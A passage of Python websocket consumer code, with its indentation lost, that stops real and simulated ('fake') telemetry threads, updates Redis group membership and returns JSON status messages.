async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Hera telemetry thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera telemetry thread was not initialized and hera at thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.hera_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping hera telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera telemetry thread and hera at was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Hera at thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera at thread was not initialized and hera telemetry thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.hera_thread.is_alive() and global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("hera-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_hera_telemetry'})
# Ensure that the thread stops
successful = True
sEclssMessage = ''
atsEclssMessage = ''
global_obj.hera_thread.join(2.0)
if global_obj.hera_thread.is_alive():
successful = False
sEclssMessage = 'There was an error stopping the hera telemetry thread.'
global_obj.hera_at_thread.join(2.0)
if global_obj.hera_at_thread.is_alive():
successful = False
atsEclssMessage = 'There was an error stopping the hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping the hera telemetry. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd('hera-group-users', self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': sEclssMessage + ' ' + atsEclssMessage,
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only sEclss thread is alive
elif global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping hera telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera telemetry thread and hera at was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + 'Hera at thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive
elif global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera at thread and hera telemetry was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('hera-group', self.channel_name)
r.sadd("hera-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Hera telemetry thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Hera at thread was not alive and hera telemetry thread was '
'already alive. Success removing using from hera group users. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[0] is None and global_obj.simulator_at_threads[0] is None:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry one but the fake at thread 1 and fake '
'telemetry thread 1 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[0] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 1 and fake telemetry 1 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 1 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 1 thread was not initialized and fake at thread 1 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[0] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 1 and fake at 1 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 1 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 1 thread was not initialized and fake telemetry 1 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[0].is_alive and global_obj.simulator_at_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_one'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread one.'
global_obj.simulator_at_threads[0].join(2.0)
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry one. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + '' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 1 and fake at 1 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 1 thread was alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread one.'
if successful:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 1 and fake telemetry 1 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 1 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then said back already killed message
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 1 and fake at thread 1 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[1] is None and global_obj.simulator_at_threads[1] is None:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry two but the fake at thread 2 and fake '
'telemetry thread 2 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[1] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 2 and fake telemetry 2 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 2 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 2 thread was not initialized and fake at thread 2 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[1] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 2 and fake at 2 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 2 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 2 thread was not initialized and fake telemetry 2 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[1].is_alive and global_obj.simulator_at_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_two'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread two.'
global_obj.simulator_at_threads[1].join(2.0)
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry two. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + '' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 2 and fake at 2 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 2 thread was alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread two.'
if successful:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 2 and fake telemetry 2 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 2 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then said back already killed message
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 2 and fake at thread 2 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[2] is None and global_obj.simulator_at_threads[2] is None:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry three but the fake at thread 3 and fake '
'telemetry thread 3 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[2] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 3 and fake telemetry 3 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 3 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 3 thread was not initialized and fake at thread 3 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[2] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 3 and fake at 3 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 3 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 3 thread was not initialized and fake telemetry 3 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[2].is_alive and global_obj.simulator_at_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_three'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread three.'
global_obj.simulator_at_threads[2].join(2.0)
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry three. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + '' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 3 and fake at 3 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 3 thread was alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 3 and fake telemetry 3 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 3 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then said back already killed message
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 3 and fake at thread 3 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[3] is None and global_obj.simulator_at_threads[3] is None:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry one but the fake at thread 4 and fake '
'telemetry thread 4 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[3] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[3].join(2.0)
